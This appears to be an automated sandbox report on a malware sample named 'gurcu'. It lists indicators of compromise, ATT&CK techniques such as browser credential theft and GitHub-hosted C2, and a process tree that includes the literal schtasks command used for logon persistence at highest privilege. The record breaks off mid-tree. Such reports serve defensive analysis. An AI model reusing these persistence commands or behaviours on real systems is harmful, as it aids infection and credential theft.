gurcu | 56f01de80d010ece0209f6b266462b28305a4373b7d5fcafa0268d2f7e3921be

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Wargods.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	TelegramRAT.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	Windows.exe

Executes dropped EXE 51 IoCs

pid	Process
2088	Wargods.exe
2280	Wargods.exe
1764	cs2go.exe
5024	cs2go.exe
4488	cs2go.exe
4512	windows.exe
2156	Windows.exe
3500	Windows.exe
4924	windows.exe
4848	Windows.exe
3276	Windows.exe
3512	Windows.exe
2064	Windows.exe
2568	Windows.exe
5040	TelegramRAT.exe
4992	Windows.exe
216	yanak.exe
796	Windows.exe
3828	Windows.exe
3252	Windows.exe
1616	windows.exe
4028	Windows.exe
2348	cs2go.exe
1412	Windows.exe
1592	Windows.exe
2404	Windows.exe
3228	Windows.exe
2156	Windows.exe
3480	Windows.exe
400	Windows.exe
3360	Windows.exe
4932	Windows.exe
4792	Windows.exe
228	Windows.exe
1636	Windows.exe
4708	Windows.exe
5104	Windows.exe
4952	Windows.exe
3724	Windows.exe
4560	Windows.exe
3348	Windows.exe
3300	Windows.exe
1712	Windows.exe
732	Windows.exe
2692	Windows.exe
1508	Windows.exe
1044	Windows.exe
3776	Windows.exe
4676	Windows.exe
4020	Windows.exe
3596	Windows.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\D:	yanak.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
63	raw.githubusercontent.com
64	raw.githubusercontent.com

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
3500	tasklist.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wargods.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wargods.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 39 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5004	PING.EXE
436	PING.EXE
4332	PING.EXE
3652	PING.EXE
768	PING.EXE
524	PING.EXE
4920	PING.EXE
3068	PING.EXE
2352	PING.EXE
3580	PING.EXE
3220	PING.EXE
4552	PING.EXE
768	PING.EXE
4072	PING.EXE
768	PING.EXE
4920	PING.EXE
2588	PING.EXE
1984	PING.EXE
4852	PING.EXE
436	PING.EXE
4992	PING.EXE
1624	PING.EXE
3348	PING.EXE
4356	PING.EXE
4528	PING.EXE
4776	PING.EXE
1284	PING.EXE
3208	PING.EXE
2284	PING.EXE
460	PING.EXE
3640	PING.EXE
3924	PING.EXE
3236	PING.EXE
4248	PING.EXE
3500	PING.EXE
3500	PING.EXE
4600	PING.EXE
4756	PING.EXE
1812	PING.EXE

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	Taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	Taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	Taskmgr.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
408	timeout.exe

Runs ping.exe 1 TTPs 39 IoCs

Remote System Discovery

T1018

pid	Process
1984	PING.EXE
4756	PING.EXE
1812	PING.EXE
4552	PING.EXE
1284	PING.EXE
4072	PING.EXE
3500	PING.EXE
768	PING.EXE
3236	PING.EXE
4992	PING.EXE
5004	PING.EXE
3652	PING.EXE
768	PING.EXE
3348	PING.EXE
3220	PING.EXE
460	PING.EXE
3500	PING.EXE
4600	PING.EXE
3068	PING.EXE
4776	PING.EXE
768	PING.EXE
3640	PING.EXE
2284	PING.EXE
2588	PING.EXE
436	PING.EXE
3208	PING.EXE
2352	PING.EXE
4852	PING.EXE
4332	PING.EXE
524	PING.EXE
4920	PING.EXE
4528	PING.EXE
4248	PING.EXE
3924	PING.EXE
1624	PING.EXE
4920	PING.EXE
4356	PING.EXE
3580	PING.EXE
436	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 43 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
1764	schtasks.exe
1160	schtasks.exe
1764	schtasks.exe
4644	schtasks.exe
4696	schtasks.exe
4136	schtasks.exe
1660	schtasks.exe
2992	schtasks.exe
4208	schtasks.exe
2156	schtasks.exe
316	schtasks.exe
5048	schtasks.exe
4876	schtasks.exe
1368	schtasks.exe
812	schtasks.exe
2436	schtasks.exe
4440	schtasks.exe
2804	schtasks.exe
4880	schtasks.exe
3032	schtasks.exe
1420	schtasks.exe
3356	schtasks.exe
3960	schtasks.exe
588	schtasks.exe
2688	schtasks.exe
3192	schtasks.exe
3044	schtasks.exe
4936	schtasks.exe
5000	schtasks.exe
3192	schtasks.exe
4876	schtasks.exe
2028	schtasks.exe
3848	schtasks.exe
4384	schtasks.exe
2180	schtasks.exe
4444	schtasks.exe
1420	schtasks.exe
4936	schtasks.exe
3304	schtasks.exe
4920	schtasks.exe
2596	schtasks.exe
5016	schtasks.exe
2064	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
216	yanak.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2088	Wargods.exe
2088	Wargods.exe
2088	Wargods.exe
2280	Wargods.exe
2280	Wargods.exe
2280	Wargods.exe
2280	Wargods.exe
2280	Wargods.exe
2280	Wargods.exe
2280	Wargods.exe
2280	Wargods.exe
2280	Wargods.exe
2280	Wargods.exe
2280	Wargods.exe
2280	Wargods.exe
1764	cs2go.exe
1764	cs2go.exe
5024	cs2go.exe
5024	cs2go.exe
4488	cs2go.exe
4488	cs2go.exe
216	yanak.exe
216	yanak.exe
216	yanak.exe
216	yanak.exe
216	yanak.exe
216	yanak.exe
216	yanak.exe
216	yanak.exe
216	yanak.exe
216	yanak.exe
216	yanak.exe
216	yanak.exe
216	yanak.exe
216	yanak.exe
216	yanak.exe
216	yanak.exe
216	yanak.exe
216	yanak.exe
216	yanak.exe
216	yanak.exe
216	yanak.exe
216	yanak.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
216	yanak.exe
216	yanak.exe
216	yanak.exe
216	yanak.exe
216	yanak.exe
216	yanak.exe
216	yanak.exe
216	yanak.exe
216	yanak.exe
216	yanak.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
216	yanak.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	372	7zFM.exe
Token: 35	372	7zFM.exe
Token: SeSecurityPrivilege	372	7zFM.exe
Token: SeDebugPrivilege	2088	Wargods.exe
Token: SeTakeOwnershipPrivilege	2088	Wargods.exe
Token: SeDebugPrivilege	2280	Wargods.exe
Token: SeTakeOwnershipPrivilege	2280	Wargods.exe
Token: SeDebugPrivilege	2280	Wargods.exe
Token: SeDebugPrivilege	2280	Wargods.exe
Token: SeDebugPrivilege	2280	Wargods.exe
Token: SeDebugPrivilege	2280	Wargods.exe
Token: SeDebugPrivilege	2280	Wargods.exe
Token: SeDebugPrivilege	4512	windows.exe
Token: SeDebugPrivilege	2156	Windows.exe
Token: SeDebugPrivilege	3500	Windows.exe
Token: SeDebugPrivilege	4924	windows.exe
Token: SeDebugPrivilege	4848	Windows.exe
Token: SeDebugPrivilege	3276	Windows.exe
Token: SeDebugPrivilege	3512	Windows.exe
Token: SeDebugPrivilege	2064	Windows.exe
Token: SeDebugPrivilege	2568	Windows.exe
Token: SeDebugPrivilege	5040	TelegramRAT.exe
Token: SeDebugPrivilege	4992	Windows.exe
Token: SeDebugPrivilege	3500	tasklist.exe
Token: SeDebugPrivilege	216	yanak.exe
Token: SeDebugPrivilege	216	yanak.exe
Token: SeDebugPrivilege	796	Windows.exe
Token: SeDebugPrivilege	3828	Windows.exe
Token: SeDebugPrivilege	3252	Windows.exe
Token: SeDebugPrivilege	1616	windows.exe
Token: SeDebugPrivilege	4028	Windows.exe
Token: SeDebugPrivilege	1412	Windows.exe
Token: SeDebugPrivilege	1592	Windows.exe
Token: SeDebugPrivilege	2404	Windows.exe
Token: SeDebugPrivilege	3228	Windows.exe
Token: SeDebugPrivilege	2156	Windows.exe
Token: SeDebugPrivilege	3480	Windows.exe
Token: SeDebugPrivilege	400	Windows.exe
Token: SeDebugPrivilege	3360	Windows.exe
Token: SeDebugPrivilege	4932	Windows.exe
Token: SeDebugPrivilege	4792	Windows.exe
Token: SeDebugPrivilege	228	Windows.exe
Token: SeDebugPrivilege	1636	Windows.exe
Token: SeDebugPrivilege	4708	Windows.exe
Token: SeDebugPrivilege	5104	Windows.exe
Token: SeDebugPrivilege	896	Taskmgr.exe
Token: SeSystemProfilePrivilege	896	Taskmgr.exe
Token: SeCreateGlobalPrivilege	896	Taskmgr.exe
Token: SeDebugPrivilege	4952	Windows.exe
Token: SeDebugPrivilege	3724	Windows.exe
Token: SeDebugPrivilege	4560	Windows.exe
Token: SeDebugPrivilege	3348	Windows.exe
Token: SeDebugPrivilege	3300	Windows.exe
Token: SeDebugPrivilege	1712	Windows.exe
Token: SeDebugPrivilege	732	Windows.exe
Token: SeDebugPrivilege	2692	Windows.exe
Token: SeDebugPrivilege	1508	Windows.exe
Token: SeDebugPrivilege	1044	Windows.exe
Token: SeDebugPrivilege	3776	Windows.exe
Token: SeDebugPrivilege	4676	Windows.exe
Token: SeDebugPrivilege	4020	Windows.exe
Token: SeDebugPrivilege	3596	Windows.exe
Token: 33	1812	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1812	AUDIODG.EXE

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
372	7zFM.exe
372	7zFM.exe
2156	Windows.exe
3500	Windows.exe
4848	Windows.exe
3276	Windows.exe
3512	Windows.exe
2064	Windows.exe
2568	Windows.exe
4992	Windows.exe
796	Windows.exe
3828	Windows.exe
3252	Windows.exe
4028	Windows.exe
1412	Windows.exe
1592	Windows.exe
2404	Windows.exe
3228	Windows.exe
2156	Windows.exe
3480	Windows.exe
400	Windows.exe
3360	Windows.exe
4932	Windows.exe
4792	Windows.exe
228	Windows.exe
1636	Windows.exe
4708	Windows.exe
5104	Windows.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
4952	Windows.exe
896	Taskmgr.exe
896	Taskmgr.exe
3724	Windows.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
4560	Windows.exe
896	Taskmgr.exe
896	Taskmgr.exe
3348	Windows.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
3300	Windows.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2156	Windows.exe
3500	Windows.exe
4848	Windows.exe
3276	Windows.exe
3512	Windows.exe
2064	Windows.exe
2568	Windows.exe
4992	Windows.exe
796	Windows.exe
3828	Windows.exe
3252	Windows.exe
4028	Windows.exe
1412	Windows.exe
1592	Windows.exe
2404	Windows.exe
3228	Windows.exe
2156	Windows.exe
3480	Windows.exe
400	Windows.exe
3360	Windows.exe
4932	Windows.exe
4792	Windows.exe
228	Windows.exe
1636	Windows.exe
4708	Windows.exe
5104	Windows.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
4952	Windows.exe
896	Taskmgr.exe
896	Taskmgr.exe
3724	Windows.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
4560	Windows.exe
896	Taskmgr.exe
896	Taskmgr.exe
3348	Windows.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
3300	Windows.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe
896	Taskmgr.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
216	yanak.exe
5104	Windows.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2088 wrote to memory of 2280	2088	Wargods.exe	102
PID 2088 wrote to memory of 2280	2088	Wargods.exe	102
PID 2088 wrote to memory of 2280	2088	Wargods.exe	102
PID 4512 wrote to memory of 3044	4512	windows.exe	121
PID 4512 wrote to memory of 3044	4512	windows.exe	121
PID 4512 wrote to memory of 2156	4512	windows.exe	123
PID 4512 wrote to memory of 2156	4512	windows.exe	123
PID 2156 wrote to memory of 1660	2156	Windows.exe	124
PID 2156 wrote to memory of 1660	2156	Windows.exe	124
PID 2156 wrote to memory of 5088	2156	Windows.exe	127
PID 2156 wrote to memory of 5088	2156	Windows.exe	127
PID 5088 wrote to memory of 4284	5088	cmd.exe	129
PID 5088 wrote to memory of 4284	5088	cmd.exe	129
PID 5088 wrote to memory of 1284	5088	cmd.exe	130
PID 5088 wrote to memory of 1284	5088	cmd.exe	130
PID 5088 wrote to memory of 3500	5088	cmd.exe	132
PID 5088 wrote to memory of 3500	5088	cmd.exe	132
PID 3500 wrote to memory of 4440	3500	Windows.exe	133
PID 3500 wrote to memory of 4440	3500	Windows.exe	133
PID 3500 wrote to memory of 4736	3500	Windows.exe	136
PID 3500 wrote to memory of 4736	3500	Windows.exe	136
PID 4736 wrote to memory of 1288	4736	cmd.exe	138
PID 4736 wrote to memory of 1288	4736	cmd.exe	138
PID 4736 wrote to memory of 3640	4736	cmd.exe	139
PID 4736 wrote to memory of 3640	4736	cmd.exe	139
PID 4924 wrote to memory of 3304	4924	windows.exe	142
PID 4924 wrote to memory of 3304	4924	windows.exe	142
PID 4924 wrote to memory of 4848	4924	windows.exe	144
PID 4924 wrote to memory of 4848	4924	windows.exe	144
PID 4848 wrote to memory of 5048	4848	Windows.exe	145
PID 4848 wrote to memory of 5048	4848	Windows.exe	145
PID 4848 wrote to memory of 1188	4848	Windows.exe	148
PID 4848 wrote to memory of 1188	4848	Windows.exe	148
PID 1188 wrote to memory of 2544	1188	cmd.exe	150
PID 1188 wrote to memory of 2544	1188	cmd.exe	150
PID 1188 wrote to memory of 3208	1188	cmd.exe	151
PID 1188 wrote to memory of 3208	1188	cmd.exe	151
PID 4736 wrote to memory of 3276	4736	cmd.exe	155
PID 4736 wrote to memory of 3276	4736	cmd.exe	155
PID 3276 wrote to memory of 4936	3276	Windows.exe	156
PID 3276 wrote to memory of 4936	3276	Windows.exe	156
PID 3276 wrote to memory of 1140	3276	Windows.exe	159
PID 3276 wrote to memory of 1140	3276	Windows.exe	159
PID 1140 wrote to memory of 1968	1140	cmd.exe	161
PID 1140 wrote to memory of 1968	1140	cmd.exe	161
PID 1140 wrote to memory of 5004	1140	cmd.exe	162
PID 1140 wrote to memory of 5004	1140	cmd.exe	162
PID 1188 wrote to memory of 3512	1188	cmd.exe	165
PID 1188 wrote to memory of 3512	1188	cmd.exe	165
PID 3512 wrote to memory of 5000	3512	Windows.exe	166
PID 3512 wrote to memory of 5000	3512	Windows.exe	166
PID 3512 wrote to memory of 4312	3512	Windows.exe	169
PID 3512 wrote to memory of 4312	3512	Windows.exe	169
PID 4312 wrote to memory of 3044	4312	cmd.exe	171
PID 4312 wrote to memory of 3044	4312	cmd.exe	171
PID 4312 wrote to memory of 3652	4312	cmd.exe	172
PID 4312 wrote to memory of 3652	4312	cmd.exe	172
PID 1140 wrote to memory of 2064	1140	cmd.exe	174
PID 1140 wrote to memory of 2064	1140	cmd.exe	174
PID 2064 wrote to memory of 2804	2064	Windows.exe	175
PID 2064 wrote to memory of 2804	2064	Windows.exe	175
PID 2064 wrote to memory of 736	2064	Windows.exe	178
PID 2064 wrote to memory of 736	2064	Windows.exe	178
PID 736 wrote to memory of 4744	736	cmd.exe	180

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\virusbomb.zip"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:372

C:\Users\Admin\Desktop\Wargods.exe
"C:\Users\Admin\Desktop\Wargods.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2088
- C:\Users\Admin\Desktop\Wargods.exe
  "C:\Users\Admin\Desktop\Wargods.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2280

C:\Users\Admin\Desktop\cs2go.exe
"C:\Users\Admin\Desktop\cs2go.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1764

C:\Users\Admin\Desktop\cs2go.exe
"C:\Users\Admin\Desktop\cs2go.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5024

C:\Users\Admin\Desktop\cs2go.exe
"C:\Users\Admin\Desktop\cs2go.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4488

C:\Users\Admin\Desktop\windows.exe
"C:\Users\Admin\Desktop\windows.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4512
- C:\Windows\SYSTEM32\schtasks.exe
  "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3044
- C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
  "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:2156
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\t40QhnFzyW4x.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5088
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:4284
  - - C:\Windows\system32\PING.EXE
      ping -n 10 localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:1284
  - - C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
      "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:3500
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4440
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DoDIIAflM8Af.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4736
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:1288
      - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3640
      - C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:3276
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4936
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bsoUxavgEd5j.bat" "
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1140
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:1968
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5004
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:2064
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe" /rl HIGHEST /f
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2804
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Dc8bgwnO1DeM.bat" "
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:736
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:4744
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3924
        
        C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Windows.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4992
        
        C:\Windows\SYSTEM32\schtasks.exe
        
